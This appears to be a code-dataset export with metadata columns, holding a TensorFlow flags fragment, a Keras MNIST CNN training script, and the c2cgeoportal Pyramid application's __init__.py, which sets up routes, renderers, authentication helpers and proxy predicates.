flags.DEFINE_integer('num_classes', 5, 'the number of classes.')
flags.DEFINE_integer('num_threads', 8, 'the number of threads.')
flags.DEFINE_boolean('fine_tuning', False, 'fine tuning.')
flags.DEFINE_string('trained_model', 'trained_model/caffenet.npy', 'trained model to use fine tuning.')
# output logs settings
# Typo fix in help text: 'even logs' -> 'event logs'.
flags.DEFINE_string('train_dir', 'train', 'directory where to write event logs and checkpoint')
flags.DEFINE_integer('max_steps', 100000, 'the number of batches to run.')
flags.DEFINE_boolean('log_device_placement', False, 'where to log device placement.')
# evaluate settings
flags.DEFINE_string('eval_dir', 'eval', 'directory where to write event logs.')
flags.DEFINE_string('eval_tfrecords', 'data/train_ex_norm.tfrecords', 'path to tfrecords file for eval')
flags.DEFINE_string('checkpoint_dir', 'train', 'directory where to read model checkpoints.')
# Fixes: removed the stray trailing comma (which turned this statement into
# a one-element tuple expression) and the 'How to often' typo.
flags.DEFINE_integer('eval_interval_secs', 60*3, 'How often to run the eval.')
flags.DEFINE_integer('num_examples', 100, 'the number of examples to run.')
flags.DEFINE_boolean('run_once', False, 'whether to run eval only once.')
| 59.547619 | 115 | 0.773291 | 378 | 2,501 | 4.902116 | 0.314815 | 0.172153 | 0.135996 | 0.067998 | 0.348624 | 0.233135 | 0.206152 | 0.178629 | 0.093362 | 0.059363 | 0 | 0.022497 | 0.093563 | 2,501 | 41 | 116 | 61 | 0.794883 | 0.09916 | 0 | 0 | 0 | 0 | 0.563224 | 0.076135 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.033333 | 0 | 0.033333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eab8b064c9e76464450980bd8d5e48a2c98df8b | 2,529 | py | Python | mnist_train.py | danielgolf/AI-playground | d1148da7a3ca42b788a7ba268d3367bca0803cb9 | [
"MIT"
] | null | null | null | mnist_train.py | danielgolf/AI-playground | d1148da7a3ca42b788a7ba268d3367bca0803cb9 | [
"MIT"
] | null | null | null | mnist_train.py | danielgolf/AI-playground | d1148da7a3ca42b788a7ba268d3367bca0803cb9 | [
"MIT"
] | null | null | null | import numpy as np
import keras
import keras.layers as layers
from get_mnist import get_mnist_preproc
### --- hyperparameters --- ###
epochs = 48
batch_size = 64
num_classes = 10
# L2 regularization strength applied to every kernel below.
reg = 3e-3
### --- hyperparams end --- ###
### --- setup data --- ###
# (images, labels) for train / validation / test splits.
# NOTE(review): exact shapes depend on get_mnist_preproc -- not visible here.
traini, trainl, vali, vall, testi, testl = get_mnist_preproc()
# One-hot encode labels; num_classes=None lets keras infer the class count.
trainl = keras.utils.to_categorical(trainl, num_classes=None)
vall = keras.utils.to_categorical(vall, num_classes=None)
testl = keras.utils.to_categorical(testl, num_classes=None)
### --- end setup --- ###
### --- define model --- ###
# Small CNN: 2x Conv -> MaxPool -> 2x Conv -> Flatten -> softmax Dense.
model = keras.Sequential()
# NOTE(review): L2 kernel regularization is already applied on every layer
# below; this TODO appears stale.
model.add(
    layers.Conv2D(
        input_shape=traini.shape[1:],
        activation='relu',
        filters=8,
        kernel_size=3,
        padding='same',
        kernel_regularizer=keras.regularizers.l2(reg)
    )
)
model.add(
    layers.Conv2D(
        activation='relu',
        filters=8,
        kernel_size=3,
        padding='same',
        kernel_regularizer=keras.regularizers.l2(reg)
    )
)
model.add(
    layers.MaxPooling2D(
        pool_size=2
    )
)
model.add(
    layers.Conv2D(
        activation='relu',
        filters=8,
        kernel_size=3,
        padding='same',
        kernel_regularizer=keras.regularizers.l2(reg)
    )
)
model.add(
    layers.Conv2D(
        activation='relu',
        filters=8,
        kernel_size=3,
        padding='same',
        kernel_regularizer=keras.regularizers.l2(reg)
    )
)
model.add(
    layers.Flatten()
)
model.add(
    layers.Dense(
        num_classes,
        activation='softmax',
        kernel_regularizer=keras.regularizers.l2(reg)
    )
)
### --- end definition --- ###
### --- training --- ###
model.compile(
    optimizer='adam',
    loss='categorical_crossentropy',
    metrics=['accuracy']
)
# Score untrained model (baseline before fitting).
scores_untrained = model.evaluate(testi, testl, verbose=1)
history = model.fit(
    traini, trainl,
    epochs=epochs,
    batch_size=batch_size,
    validation_data=(vali, vall),
    shuffle=True
)
print('Test loss untrained:', scores_untrained[0])
print('Test accuracy untrained:', scores_untrained[1])
# Score trained model.
scores = model.evaluate(testi, testl, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
### --- end training --- ###
### --- save model --- ###
# Architecture goes to JSON, weights to HDF5 (./mnist/ must already exist).
model.summary()
json_string = model.to_json()
with open('./mnist/mnist_model.json', 'w') as file:
    file.write(json_string + '\n')
model.save_weights('./mnist/mnist_weights.hdf5')
### --- end save --- ###
| 19.453846 | 62 | 0.627521 | 293 | 2,529 | 5.286689 | 0.331058 | 0.036152 | 0.063267 | 0.109748 | 0.336346 | 0.336346 | 0.271143 | 0.271143 | 0.271143 | 0.271143 | 0 | 0.01757 | 0.212337 | 2,529 | 129 | 63 | 19.604651 | 0.76004 | 0.109134 | 0 | 0.363636 | 0 | 0 | 0.08958 | 0.033821 | 0 | 0 | 0 | 0.007752 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.045455 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eaeba892f2de5df103a615e0e9a36e8ab22471a | 25,480 | py | Python | c2cgeoportal/__init__.py | kalbermattenm/c2cgeoportal | 4ab41ec7130536bc86f4c05ca330e9ce3dfb93c1 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | c2cgeoportal/__init__.py | kalbermattenm/c2cgeoportal | 4ab41ec7130536bc86f4c05ca330e9ce3dfb93c1 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | c2cgeoportal/__init__.py | kalbermattenm/c2cgeoportal | 4ab41ec7130536bc86f4c05ca330e9ce3dfb93c1 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2011-2016, Camptocamp SA
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import logging
import sqlalchemy
import sqlahelper
import pyramid_tm
import mimetypes
import c2c.template
from urlparse import urlsplit
import simplejson as json
from socket import gethostbyname, gaierror
from ipcalc import IP, Network
import importlib
from pyramid_mako import add_mako_renderer
from pyramid.interfaces import IStaticURLInfo
from pyramid.httpexceptions import HTTPException
from papyrus.renderers import GeoJSON, XSD
from c2cgeoportal import stats
from c2cgeoportal.resources import FAModels
from c2cgeoportal.lib import dbreflection, get_setting, caching, \
C2CPregenerator, MultiDomainStaticURLInfo
log = logging.getLogger(__name__)
# Module-level globals used by (sql|form)alchemy based code; they are filled
# in from the settings inside includeme() below.
srid = None
schema = None
parentschema = None
formalchemy_language = None
formalchemy_default_zoom = 10
formalchemy_default_x = 740000
formalchemy_default_y = 5860000
formalchemy_available_functionalities = []
formalchemy_available_metadata = []
# Header predicate to accept only JSON content.
# OL/cgxp are not setting the correct content type for JSON. We have to accept
# XML as well even though JSON is actually sent.
JSON_CONTENT_TYPE = "Content-Type:application/(?:json|xml)"
class DecimalJSON:
    """Pyramid renderer factory producing JSON (with Decimal support via
    simplejson's ``use_decimal``) and optional JSONP wrapping when the
    request carries a callback parameter."""
    def __init__(self, jsonp_param_name="callback"):
        # Query-string parameter name holding the JSONP callback.
        self.jsonp_param_name = jsonp_param_name
    def __call__(self, info):
        def _render(value, system):
            body = json.dumps(value, use_decimal=True)
            request = system.get("request")
            if request is None:
                # No request in the renderer system dict: plain JSON body.
                return body
            callback = request.params.get(self.jsonp_param_name)
            if callback is None:
                request.response.content_type = "application/json"
                return body
            # JSONP: wrap the payload in the caller-supplied function name.
            request.response.content_type = "text/javascript"
            return "%(callback)s(%(json)s);" % {
                "callback": callback,
                "json": body
            }
        return _render
# Interface type identifiers accepted by add_interface().
INTERFACE_TYPE_CGXP = "cgxp"
INTERFACE_TYPE_NGEO = "ngeo"
# NOTE: intentionally the same value as INTERFACE_TYPE_NGEO -- the catalogue
# variant shares the ngeo wiring.
INTERFACE_TYPE_NGEO_CATALOGUE = "ngeo"
def add_interface(
    config, interface_name=None, interface_type=INTERFACE_TYPE_CGXP, **kwargs
): # pragma: nocover
    """Register the routes and views of one UI interface.

    For CGXP, a ``None`` interface name maps to the default "main"
    interface served at "/"; named interfaces get "/<name>" routes.
    For ngeo, the "desktop" interface is served at "/".
    """
    if interface_type == INTERFACE_TYPE_CGXP:
        if interface_name is None:
            add_interface_cgxp(
                config,
                interface_name="main",
                route_names=("home", "viewer"),
                routes=("/", "/viewer.js"),
                renderers=("index.html", "viewer.js"),
            )
        else:
            add_interface_cgxp(
                config,
                interface_name=interface_name,
                route_names=(interface_name, interface_name + ".js"),
                routes=("/%s" % interface_name, "/%s.js" % interface_name),
                renderers=("/%s.html" % interface_name, "/%s.js" % interface_name),
            )
    elif interface_type == INTERFACE_TYPE_NGEO:
        # "desktop" is the default ngeo interface and lives at the site root.
        route = "/" if interface_name == "desktop" else "/%s" % interface_name
        add_interface_ngeo(
            config,
            interface_name=interface_name,
            route_name=interface_name,
            route=route,
            renderer="/%s.html" % interface_name,
        )
def add_interface_cgxp(config, interface_name, route_names, routes, renderers): # pragma: nocover
    """Register the index, permalink-theme and viewer.js routes/views of one
    CGXP interface."""
    # Imported here rather than at module level so the model is not loaded
    # too early.
    from c2cgeoportal.views.entry import Entry
    def add_interface(f):
        # View decorator tagging every request with the interface name.
        def new_f(root, request):
            request.interface_name = interface_name
            return f(root, request)
        return new_f
    config.add_route(route_names[0], routes[0])
    config.add_view(
        Entry,
        decorator=add_interface,
        attr="get_cgxp_index_vars",
        route_name=route_names[0],
        renderer=renderers[0]
    )
    # permalink theme: recover the theme for generating custom viewer.js url
    config.add_route(
        "%stheme" % route_names[0],
        "%s%stheme/*themes" % (routes[0], "" if routes[0][-1] == "/" else "/"),
    )
    config.add_view(
        Entry,
        decorator=add_interface,
        attr="get_cgxp_permalinktheme_vars",
        route_name="%stheme" % route_names[0],
        renderer=renderers[0]
    )
    # The viewer.js route varies per role, hence the role-aware pregenerator.
    config.add_route(
        route_names[1], routes[1],
        request_method="GET",
        pregenerator=C2CPregenerator(role=True),
    )
    config.add_view(
        Entry,
        decorator=add_interface,
        attr="get_cgxp_viewer_vars",
        route_name=route_names[1],
        renderer=renderers[1]
    )
# Guard so the ngeo static views are registered only once even when several
# ngeo interfaces are added.
ngeo_static_init = False
def add_interface_ngeo(config, interface_name, route_name, route, renderer): # pragma: nocover
    """Register the index and permalink-theme routes/views of one ngeo
    interface, plus (once) the ngeo static views."""
    # Imported here rather than at module level so the model is not loaded
    # too early.
    from c2cgeoportal.views.entry import Entry
    def add_interface(f):
        # View decorator tagging every request with the interface name.
        def new_f(root, request):
            request.interface_name = interface_name
            return f(root, request)
        return new_f
    config.add_route(route_name, route, request_method="GET")
    config.add_view(
        Entry,
        decorator=add_interface,
        attr="get_ngeo_index_vars",
        route_name=route_name,
        renderer=renderer
    )
    # permalink theme: recover the theme for generating custom viewer.js url
    config.add_route(
        "%stheme" % route_name,
        "%s%stheme/*themes" % (route, "" if route[-1] == "/" else "/"),
        request_method="GET",
    )
    config.add_view(
        Entry,
        decorator=add_interface,
        attr="get_ngeo_permalinktheme_vars",
        route_name="%stheme" % route_name,
        renderer=renderer
    )
    global ngeo_static_init
    if not ngeo_static_init:
        add_static_view_ngeo(config)
        ngeo_static_init = True
def add_static_view_ngeo(config): # pragma: nocover
    """ Add the project static views for ngeo (project assets, node_modules,
    closure library) and register the .less MIME type. """
    package = config.get_settings()["package"]
    _add_static_view(config, "proj-ngeo", "%s:static-ngeo" % package)
    # Let the project's static-ngeo dir override c2cgeoportal's bundled assets.
    config.override_asset(
        to_override="c2cgeoportal:project/",
        override_with="%s:static-ngeo/" % package
    )
    config.add_static_view(
        name=package,
        path="%s:static" % package,
        cache_max_age=int(config.get_settings()["default_max_age"])
    )
    config.add_static_view("node_modules", config.get_settings().get("node_modules_path"))
    config.add_static_view("closure", config.get_settings().get("closure_library_path"))
    # Serve .less stylesheets with a CSS content type.
    mimetypes.add_type("text/css", ".less")
def add_admin_interface(config):
    """Register the formalchemy admin UI, but only when the
    ``enable_admin_interface`` setting is turned on."""
    if not config.get_settings().get("enable_admin_interface", False):
        # Admin interface disabled: nothing to wire up.
        return
    config.formalchemy_admin(
        route_name="admin",
        package=config.get_settings()["package"],
        view="fa.jquery.pyramid.ModelView",
        factory=FAModels
    )
def add_static_view(config):
    """ Add the project static view for CGXP. """
    package = config.get_settings()["package"]
    _add_static_view(config, "proj", "%s:static" % package)
    # Let the project's static dir override c2cgeoportal's bundled assets.
    config.override_asset(
        to_override="c2cgeoportal:project/",
        override_with="%s:static/" % package
    )
# Names of the static views registered through _add_static_view; presumably
# consumed elsewhere in the package -- not visible in this file chunk.
CACHE_PATH = []
def _add_static_view(config, name, path):
    """Register a cache-busted static view *name* serving asset spec *path*."""
    from c2cgeoportal.lib.cacheversion import version_cache_buster
    config.add_static_view(
        name=name,
        path=path,
        cache_max_age=int(config.get_settings()["default_max_age"]),
    )
    config.add_cache_buster(path, version_cache_buster)
    # NOTE: `unicode` makes this Python-2-only code.
    CACHE_PATH.append(unicode(name))
def locale_negotiator(request):
    """Pick the request language: the explicit ``lang`` query parameter wins,
    otherwise negotiate the Accept-Language header against the configured
    locales, falling back to ``default_locale_name``."""
    lang = request.params.get("lang")
    if lang is not None:
        return lang
    settings = request.registry.settings
    # best_match returns default_match when nothing in the header matches.
    return request.accept_language.best_match(
        settings.get("available_locale_names"),
        default_match=settings.get("default_locale_name"))
def _match_url_start(ref, val):
"""
Checks that the val URL starts like the ref URL.
"""
ref_parts = ref.rstrip("/").split("/")
val_parts = val.rstrip("/").split("/")[0:len(ref_parts)]
return ref_parts == val_parts
def _is_valid_referer(referer, settings):
    """Return True when *referer* starts with one of the configured
    ``authorized_referers`` URL prefixes.

    An empty or ``None`` referer is never valid.
    """
    if not referer:
        return False
    # Renamed from `list`, which shadowed the builtin of the same name.
    authorized = settings.get("authorized_referers", [])
    return any(_match_url_start(ref, referer) for ref in authorized)
def _create_get_user_from_request(settings):
    """Build the ``request.user`` reify-style callable, closing over the
    application *settings* (used for the referer check)."""
    def get_user_from_request(request):
        """ Return the User object for the request.
        Return ``None`` if:
        * user is anonymous
        * it does not exist in the database
        * the referer is invalid
        """
        from c2cgeoportal.models import DBSession, User
        # disable the referer check for the admin interface
        # NOTE: "and" binds tighter than "or" -- the check passes when
        # (admin path AND no referer) OR the referer is authorized.
        if not (
            request.path_info_peek() == "admin" and request.referer is None or
            _is_valid_referer(request.referer, settings)
        ):
            if request.referer is not None:
                log.warning("Invalid referer for %s: %s", request.path_qs,
                            repr(request.referer))
            return None
        # Memoize the lookup on the request object itself.
        if not hasattr(request, "_user"):
            request._user = None
            username = request.authenticated_userid
            if username is not None:
                # We know we will need the role object of the
                # user so we use joined loading
                request._user = DBSession.query(User) \
                    .filter_by(username=username) \
                    .first()
        return request._user
    return get_user_from_request
def set_user_validator(config, user_validator):
    """Pyramid directive registering *user_validator* as the credential
    checker.

    The validator receives ``request``, ``username`` and ``password`` and
    must return the user name when the credentials are valid, ``None``
    otherwise.  It must not perform the actual authentication by calling
    ``remember``; the ``login`` view handles that.
    """
    # Defer the registry mutation through config.action() so it takes part
    # in Pyramid's configuration conflict detection.
    config.action(
        "user_validator",
        lambda: setattr(config.registry, "validate_user", user_validator))
def default_user_validator(request, username, password):
    """
    Validate the username/password. This is c2cgeoportal's
    default user validator.
    Return ``None`` if we are anonymous, the string to remember otherwise.
    """
    # Imported here so the model (and its DB engine) is not loaded at module
    # import time.
    from c2cgeoportal.models import DBSession, User
    user = DBSession.query(User).filter_by(username=username).first()
    # Valid credentials -> echo back the username for ``remember``; else None.
    return username if user and user.validate_password(password) else None
class OgcproxyRoutePredicate:
    """ Custom route predicate for the ogcproxy route.

    Rejects proxy requests whose target host resolves to a loopback or
    RFC 1918 private network, so the OGC proxy cannot be used to reach
    internal services (such as the app's own mapserv script). """
    def __init__(self, val, config):
        # Address ranges that must never be proxied to.
        self.private_networks = [
            Network("127.0.0.0/8"),
            Network("10.0.0.0/8"),
            Network("172.16.0.0/12"),
            Network("192.168.0.0/16"),
        ]
    def __call__(self, context, request):
        url = request.params.get("url")
        if url is None:
            # No target URL given: the route does not match.
            return False
        parts = urlsplit(url)
        try:
            ip = IP(gethostbyname(parts.netloc))
        except gaierror as e:
            # DNS resolution failed: refuse rather than proxy blindly.
            log.info("Unable to get host name for %s: %s" % (url, e))
            return False
        for net in self.private_networks:
            if ip in net:
                return False
        return True
    def phash(self): # pragma: nocover
        # Predicate hash used by Pyramid for route uniqueness; constant here.
        return ""
class MapserverproxyRoutePredicate:
    """ Serve as a custom route predicate function for mapserverproxy.
    If the hide_capabilities setting is set and is true then we want to
    return 404s on GetCapabilities requests."""
    def __init__(self, val, config):
        pass
    def __call__(self, context, request):
        hide_capabilities = request.registry.settings.get("hide_capabilities")
        if not hide_capabilities:
            return True
        # Lower-case keys and values so the WMS "REQUEST" parameter is
        # matched case-insensitively.
        # NOTE: `unicode`/`iteritems` make this Python-2-only code.
        params = dict(
            (k.lower(), unicode(v).lower()) for k, v in request.params.iteritems()
        )
        # Match (i.e. let the route handle it) only when the request is NOT a
        # GetCapabilities; GetCapabilities then falls through to a 404.
        return "request" not in params or params["request"] != u"getcapabilities"
    def phash(self):
        return ""
def add_cors_route(config, pattern, service):
    """
    Add the OPTIONS route and view needed for services supporting CORS.

    *service* selects which Access-Control headers set_common_headers sends.
    """
    route_name = pattern + "_options"
    config.add_route(route_name, pattern, request_method="OPTIONS")
    def view(request): # pragma: nocover
        from c2cgeoportal.lib.caching import set_common_headers, NO_CACHE
        return set_common_headers(request, service, NO_CACHE)
    config.add_view(view, route_name=route_name)
def error_handler(http_exception, request): # pragma: nocover
    """
    View callable for handling all the exceptions that are not already handled.
    """
    log.warning("%s returned status code %s", request.url,
                http_exception.status_code)
    # Return the exception itself as the response, with no-cache headers, so
    # clients never see a spurious 200 for a failed request.
    return caching.set_common_headers(
        request, "error", caching.NO_CACHE, http_exception, vary=True
    )
def call_hook(settings, name, *args, **kwargs):
    """Look up hook *name* in ``settings["hooks"]`` (a dotted
    "package.module.function" path), import it and call it with the given
    arguments.  Silently does nothing when the hook is not configured."""
    hook_path = settings.get("hooks", {}).get(name)
    if hook_path is None:
        return
    # Split "pkg.mod.func" into the module path and the attribute name.
    module_name, _, function_name = hook_path.rpartition(".")
    module = importlib.import_module(module_name)
    getattr(module, function_name)(*args, **kwargs)
def includeme(config):
    """ Pyramid ``includeme``: configure the c2cgeoportal application.

    Loads the YAML application config into the settings, initializes the
    database, caching and renderers, registers all routes/views and the
    static views.  Mutates *config* in place (returns nothing).
    """
    # update the settings object from the YAML application config file
    settings = config.get_settings()
    settings.update(c2c.template.get_config(settings.get("app.cfg")))
    call_hook(settings, "after_settings", settings)
    # The module-level globals below are filled in from the settings further
    # down and consumed by the (sql|form)alchemy based code.
    global srid
    global schema
    global parentschema
    global formalchemy_language
    global formalchemy_default_zoom
    global formalchemy_default_x
    global formalchemy_default_y
    global formalchemy_available_functionalities
    global formalchemy_available_metadata
    config.add_request_method(_create_get_user_from_request(settings),
                              name="user", property=True)
    # configure 'locale' dir as the translation dir for c2cgeoportal app
    config.add_translation_dirs("c2cgeoportal:locale/")
    # initialize database
    engine = sqlalchemy.engine_from_config(
        settings,
        "sqlalchemy.")
    sqlahelper.add_engine(engine)
    config.include(pyramid_tm.includeme)
    config.include("pyramid_closure")
    # initialize the dbreflection module
    dbreflection.init(engine)
    # dogpile.cache configuration
    caching.init_region(settings["cache"])
    caching.invalidate_region()
    # Register a tween to get back the cache buster path.
    config.add_tween("c2cgeoportal.lib.cacheversion.CachebusterTween")
    # bind the mako renderer to other file extensions
    add_mako_renderer(config, ".html")
    add_mako_renderer(config, ".js")
    config.include("pyramid_chameleon")
    # add the "geojson" renderer
    config.add_renderer("geojson", GeoJSON())
    # add decimal json renderer
    config.add_renderer("decimaljson", DecimalJSON())
    # add the "xsd" renderer
    config.add_renderer("xsd", XSD(
        sequence_callback=dbreflection._xsd_sequence_callback
    ))
    # add the set_user_validator directive, and set a default user
    # validator
    config.add_directive("set_user_validator", set_user_validator)
    config.set_user_validator(default_user_validator)
    if settings.get("ogcproxy_enable", False): # pragma: nocover
        # add an OGCProxy view
        config.add_route_predicate("ogc_server", OgcproxyRoutePredicate)
        config.add_route(
            "ogcproxy", "/ogcproxy",
            ogc_server=True
        )
        config.add_view("papyrus_ogcproxy.views:ogcproxy", route_name="ogcproxy")
    # add routes to the mapserver proxy
    config.add_route_predicate("mapserverproxy", MapserverproxyRoutePredicate)
    config.add_route(
        "mapserverproxy", "/mapserv_proxy",
        mapserverproxy=True, pregenerator=C2CPregenerator(role=True),
    )
    # add route to the tinyows proxy
    config.add_route(
        "tinyowsproxy", "/tinyows_proxy",
        pregenerator=C2CPregenerator(role=True),
    )
    # add routes to csv view
    config.add_route("csvecho", "/csv", request_method="POST")
    # add route to the export GPX/KML view
    config.add_route("exportgpxkml", "/exportgpxkml")
    # add routes to the echo service
    config.add_route("echo", "/echo", request_method="POST")
    # add routes to the entry view class
    config.add_route("base", "/", static=True)
    config.add_route("loginform", "/login.html", request_method="GET")
    # Each authentication endpoint gets a CORS OPTIONS preflight companion.
    add_cors_route(config, "/login", "login")
    config.add_route("login", "/login", request_method="POST")
    add_cors_route(config, "/logout", "login")
    config.add_route("logout", "/logout", request_method="GET")
    add_cors_route(config, "/loginchange", "login")
    config.add_route("loginchange", "/loginchange", request_method="POST")
    add_cors_route(config, "/loginresetpassword", "login")
    config.add_route("loginresetpassword", "/loginresetpassword", request_method="POST")
    add_cors_route(config, "/loginuser", "login")
    config.add_route("loginuser", "/loginuser", request_method="GET")
    config.add_route("testi18n", "/testi18n.html", request_method="GET")
    config.add_route("apijs", "/api.js", request_method="GET")
    config.add_route("xapijs", "/xapi.js", request_method="GET")
    config.add_route("apihelp", "/apihelp.html", request_method="GET")
    config.add_route("xapihelp", "/xapihelp.html", request_method="GET")
    config.add_route(
        "themes", "/themes",
        request_method="GET",
        pregenerator=C2CPregenerator(role=True),
    )
    config.add_route("invalidate", "/invalidate", request_method="GET")
    # checker routes, Checkers are web services to test and assess that
    # the application is correctly functioning.
    # These web services are used by tools like (nagios).
    config.add_route("checker_routes", "/checker_routes", request_method="GET")
    config.add_route("checker_lang_files", "/checker_lang_files", request_method="GET")
    config.add_route("checker_pdf3", "/checker_pdf3", request_method="GET")
    config.add_route("checker_fts", "/checker_fts", request_method="GET")
    config.add_route("checker_theme_errors", "/checker_theme_errors", request_method="GET")
    config.add_route("checker_phantomjs", "/checker_phantomjs", request_method="GET")
    # collector
    config.add_route("check_collector", "/check_collector", request_method="GET")
    # print proxy routes
    config.add_route("printproxy", "/printproxy", request_method="HEAD")
    add_cors_route(config, "/printproxy/*all", "print")
    config.add_route(
        "printproxy_capabilities", "/printproxy/capabilities.json",
        request_method="GET", pregenerator=C2CPregenerator(role=True),
    )
    config.add_route(
        "printproxy_report_create", "/printproxy/report.{format}",
        request_method="POST", header=JSON_CONTENT_TYPE
    )
    config.add_route(
        "printproxy_status", "/printproxy/status/{ref}.json",
        request_method="GET"
    )
    config.add_route(
        "printproxy_cancel", "/printproxy/cancel/{ref}",
        request_method="DELETE"
    )
    config.add_route(
        "printproxy_report_get", "/printproxy/report/{ref}",
        request_method="GET"
    )
    # full text search routes
    add_cors_route(config, "/fulltextsearch", "fulltextsearch")
    config.add_route("fulltextsearch", "/fulltextsearch")
    # Access to raster data
    add_cors_route(config, "/raster", "raster")
    config.add_route("raster", "/raster", request_method="GET")
    add_cors_route(config, "/profile.{ext}", "profile")
    config.add_route("profile.csv", "/profile.csv", request_method="POST")
    config.add_route("profile.json", "/profile.json", request_method="POST")
    # shortener
    config.add_route("shortener_create", "/short/create", request_method="POST")
    config.add_route("shortener_get", "/short/{ref}", request_method="GET")
    # Geometry processing
    config.add_route("difference", "/difference", request_method="POST")
    # PDF report tool
    config.add_route("pdfreport", "/pdfreport/{layername}/{id}", request_method="GET")
    # add routes for the "layers" web service
    add_cors_route(config, "/layers/*all", "layers")
    config.add_route(
        "layers_count", "/layers/{layer_id:\\d+}/count",
        request_method="GET"
    )
    config.add_route(
        "layers_metadata", "/layers/{layer_id:\\d+}/md.xsd",
        request_method="GET",
        pregenerator=C2CPregenerator(role=True),
    )
    config.add_route(
        "layers_read_many",
        "/layers/{layer_id:\\d+,?(\\d+,)*\\d*$}",
        request_method="GET") # supports URLs like /layers/1,2,3
    config.add_route(
        "layers_read_one", "/layers/{layer_id:\\d+}/{feature_id}",
        request_method="GET")
    config.add_route(
        "layers_create", "/layers/{layer_id:\\d+}",
        request_method="POST", header=JSON_CONTENT_TYPE)
    config.add_route(
        "layers_update", "/layers/{layer_id:\\d+}/{feature_id}",
        request_method="PUT", header=JSON_CONTENT_TYPE)
    config.add_route(
        "layers_delete", "/layers/{layer_id:\\d+}/{feature_id}",
        request_method="DELETE")
    config.add_route(
        "layers_enumerate_attribute_values",
        "/layers/{layer_name}/values/{field_name}",
        request_method="GET",
        pregenerator=C2CPregenerator(),
    )
    # there's no view corresponding to that route, it is to be used from
    # mako templates to get the root of the "layers" web service
    config.add_route("layers_root", "/layers/", request_method="HEAD")
    # Resource proxy (load external url, useful when loading non https content)
    config.add_route("resourceproxy", "/resourceproxy", request_method="GET")
    # pyramid_formalchemy's configuration
    config.include("pyramid_formalchemy")
    config.include("fa.jquery")
    # define the srid, schema and parentschema
    # as global variables to be usable in the model
    srid = settings["srid"]
    schema = settings["schema"]
    parentschema = settings["parentschema"]
    formalchemy_default_zoom = get_setting(
        settings,
        ("admin_interface", "map_zoom"), formalchemy_default_zoom)
    formalchemy_default_x = get_setting(
        settings,
        ("admin_interface", "map_x"), formalchemy_default_x)
    formalchemy_default_y = get_setting(
        settings,
        ("admin_interface", "map_y"), formalchemy_default_y)
    formalchemy_available_functionalities = get_setting(
        settings,
        ("admin_interface", "available_functionalities"),
        formalchemy_available_functionalities)
    formalchemy_available_metadata = get_setting(
        settings,
        ("admin_interface", "available_metadata"),
        formalchemy_available_metadata)
    config.add_route("checker_all", "/checker_all", request_method="GET")
    config.add_route("version_json", "/version.json", request_method="GET")
    stats.init(config)
    # scan view decorator for adding routes
    config.scan(ignore=["c2cgeoportal.tests", "c2cgeoportal.scripts"])
    # Multi-domain aware static URL generation.
    config.registry.registerUtility(
        MultiDomainStaticURLInfo(), IStaticURLInfo)
    # add the static view (for static resources)
    _add_static_view(config, "static", "c2cgeoportal:static")
    _add_static_view(config, "project", "c2cgeoportal:project")
    add_admin_interface(config)
    add_static_view(config)
    # Handles the other HTTP errors raised by the views. Without that,
    # the client receives a status=200 without content.
    config.add_view(error_handler, context=HTTPException)
| 35.586592 | 98 | 0.672567 | 3,060 | 25,480 | 5.395098 | 0.19281 | 0.045248 | 0.051729 | 0.022654 | 0.279666 | 0.229814 | 0.162336 | 0.124962 | 0.110849 | 0.107759 | 0 | 0.006095 | 0.220879 | 25,480 | 715 | 99 | 35.636364 | 0.825509 | 0.206279 | 0 | 0.222917 | 0 | 0 | 0.171229 | 0.044174 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06875 | false | 0.010417 | 0.052083 | 0.004167 | 0.18125 | 0.014583 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
